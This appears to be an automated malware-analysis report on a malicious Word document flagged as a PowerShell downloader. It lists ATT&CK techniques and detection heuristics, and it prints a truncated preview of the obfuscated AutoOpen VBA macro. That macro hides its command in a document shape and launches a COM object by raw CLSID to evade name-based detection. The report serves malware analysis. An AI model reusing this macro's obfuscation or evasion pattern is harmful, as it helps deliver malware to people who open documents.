MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 Signed Binary Proxy Execution: Rundll32
T1059.003 Windows Command Shell
The sample contains VBA macros with an AutoOpen function, a common technique for initial execution. Critical heuristics indicate the use of the dangerous WScript.Shell COM object, which is often used to download and execute further payloads. The ClamAV detection name 'Doc.Malware.Powload-6813874-0' further supports a malicious classification, likely involving a PowerShell-based downloader.
Heuristics 7
-
ClamAV: Doc.Malware.Powload-6813874-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6813874-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7353 bytes |
SHA-256: a608e9357e368a852156da2e494f22d8e6b8ec6ccf39fca08a34dcf06b33c962 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GARczMqm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case vkrIvo
Case 261796299
JMPfnbvWX = CBool(PIMdwq)
XozAFqzj = 202977267
Case 254520823
BwZTiSn = Atn(aJpVSAf)
oDwSlB = Atn(150279987 * CLng(161171088))
End Select
For Each opEWS In IoUUarvat
WPbhSjzZf = ffUpA * CDate(BTtciGH * jjwjES) * dFcPluqhH / Sin(iqKQdUiU) / qbjQH + 108102333 - 51234510 + Chr(94127773) + (liTVM * CasZOi)
Next
On Error Resume Next
Select Case wbSfAuHqB
Case 228511584
MWQBzzj = CBool(iplArb)
EBzJRFzYj = 140090619
Case 317061610
CORXFoUc = Atn(HjQGqziK)
bbEJpG = Atn(281881762 * CLng(290387237))
End Select
For Each QMzhjD In iwQRfL
wIzRiDb = VOVuU * CDate(sZLjNXEQ * ZDNvMAOs) * PFFBsoIo / Sin(IrjLlidl) / EkSnRhX + 152978737 - 94832442 + Chr(135138031) + (PHGVn * PcqjWYY)
Next
Set mnDPzzDM = Shapes("CwhpKNbbRl")
On Error Resume Next
Select Case BXfUnH
Case 57851
RzRMWR = CBool(ZJPFj)
tTPSvJ = 198933616
Case 105961790
VBHWTPR = Atn(KzNSa)
UJVBwsLR = Atn(85127322 * CLng(240300735))
End Select
For Each IDPCrwVCw In PFAzrHz
HVBSk = IaHhXJEpW * CDate(LMCHSzr * iGFEUD) * kLNFO / Sin(pSUtRqoin) / aiVmfFr + 246706414 - 53337129 + Chr(201585195) + (odpEFEcn * rjIpVtiOB)
Next
On Error Resume Next
Select Case kCjBkNGiv
Case 179842107
KQzTP = CBool(WINstzHPE)
UXMzjLK = 106854421
Case 50139025
voBBioWD = Atn(HcQiaTF)
BrFcm = Atn(208979615 * CLng(235211728))
End Select
For Each LjbWwGhM In whGLJFaD
zBDolfaH = ZCEJJ * CDate(QXFuhd * vEAcm) * srlfYwiih / Sin(wvvqzIK) / oYovmzf + 150600169 - 62911840 + Chr(313256652) + (zoItb * QnWjKa)
Next
wKlRJ = "" + bzjFBo + rifVzRZ + LmLrpjqa + mWdkzb + mnDPzzDM.TextFrame.TextRange.Text + YjUEDZp + vJiGmDId + uBBpuTAn
On Error Resume Next
Select Case Mzupinujk
Case 58059155
XJHHcGwhs = CBool(YWNnXzi)
vvSVp = 327101863
Case 331789580
PXXUt = Atn(EqNtLoc)
KjBXnajCG = Atn(262793553 * CLng(106085712))
End Select
For Each pMcBUJI In qZJYbBS
Ziophvl = URJXWMQj * CDate(UhrNL * BfCIkZc) * mIIcczart / Sin(sjCAlDd) / aUHUa + 64122061 - 90789514 + Chr(29569258) + (KimAKrVX * Njnjdc)
Next
On Error Resume Next
Select Case FoowV
Case 157925559
JAARS = CBool(tiZtQn)
jWkiKG = 12526672
Case 298256573
IjwQi = Atn(LwbTr)
GKiCRJp = Atn(196775958 * CLng(107896437))
End Select
For Each UEFXiEFlO In HErQVBi
WbRwvnaM = jtwMP * CDate(RPrLLbHs * EVWCSShPf) * HoZXJ / Sin(wVBYsS) / rPaAd + 282037331 - 128943292 + Chr(50025956) + (ibsZRY * kzdRGIzrr)
Next
On Error Resume Next
Select Case OUPWOQjo
Case 251591343
pYXKlFHSK = CBool(XKjqbzhz)
WFAWp = 175999019
Case 164045125
UcOzV = Atn(ssMtU)
UDRWUJE = Atn(266638292 * CLng(161282208))
End Select
For Each OihmPkoCh In MznpvlBH
zOFNdhSo = CjWkiZN * CDate(SjnIEKMk * WQbaj) * zAajJ / Sin(EEwwJz) / NcPNc + 105572309 - 123600096 + Chr(121896687) + (ftDtdT * BMDSYY)
Next
On Error Resume Next
Select Case NsCjvOaRo
Case 131495540
lwcodjh = CBool(zkbFMAAB)
jikwnwVN = 201509120
Case 288855890
djCjkaCjr = Atn(PwZwF)
lmqivN = Atn(284979970 * CLng(226420251))
End Select
For Each jfzAG In zroLShr
lwUKZUk = Bihkao * CDate(zQpTd * uFfki) * Gklmju / Sin(EkaCRO) / YiOSWAK + 229956099 - 282008199 + Chr(306754750) + (ONTrsoa * EdaPwBpIk)
Next
Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B8
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.